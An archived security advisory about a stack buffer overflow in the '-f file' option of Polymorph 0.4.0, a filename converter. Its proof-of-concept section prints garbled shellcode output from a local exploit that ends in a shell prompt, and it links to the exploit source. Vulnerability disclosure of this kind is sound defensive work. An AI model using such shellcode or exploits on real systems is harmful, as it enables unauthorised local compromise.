Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Linux :: Apps A-M :: adv001.txt

Bug found in: Polymorph 0.4.0




-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

01100011 - code 'security research team'
- ----------------------------------------

- - http://www.c-code.net
- - Advisory and PoC exploit by: demz // demz@c-code.net
- - Vulnerable source: Polymorph v0.4.0
- - Bug type: Stackoverflow
- - Priority: 3

- ----------------------------------------

[01] Description
[02] Vulnerable
[03] Proof of concept
[04] Vendor response

[01] Description

     Polymorph is a filesystem "unixier" (a Win32 -> Unix filename convertor)
     When downloading images from Usenet alot of filenames are mangled by MS Outlook
     and other, less caring, newsagents.
     There could be files with strange names like C:\\PIX\\HUBBLE\\Eagle\ Nebula\ 0532.JPG
     and this, of course, is unacceptable.
     Polymorph looks in the current working directory and finds strange filenames like this.
     It then renames the file after converting all the characters to lowercase and
     trimming the cruft from the original.
     The previous example turned out to have the name eagle_nebula_0532.jpg which is
     much more useful.

     Polymorph contains an unchecked buffer in the "-f file" option,
     this can be exploited very simple.

[02] Vulnerable

     Vulnerable and exploitable version, tested on Redhat 8.0:
    
     -  Polymorph 0.4.0

     Maybe also prior versions are vulnerable.
     Source can be found at: http://chromebob.com/proj/polymorph.html

[03] Proof of concept

     [demz@lab polymorph-0.4.0]$ ./c-polymorph

     Polymorph 0.4.0 local exploit
     ---------------------------------------- demz @ c-code.net --
     polymorph had trouble converting

                                  𐝣1砂F蛝1繮hn/shh//bi夈PS夅櫚
              蛝1腊蛺悙悙% to

                                   1򤋱砂f蛝1纏hn/shh//bi夈ps夅櫚

              蛝1腊 悙悙                  痼...

     the file is now possibly corrupt
     sh-2.05b$

     A proof of concept exploit can be found at:
     http://www.c-code.net/Releases/Exploits/c-polymorph.c

[04] Vendor response

     The vendor is informed.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+zTzZ8ToiGqnwMzARAphBAJ9L+MOY5R5arOeb1slTXeNgYAgwsgCcD8od
IwAUN0zzl8ZhkfZN5judNNY=
=oc09
-----END PGP SIGNATURE-----


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH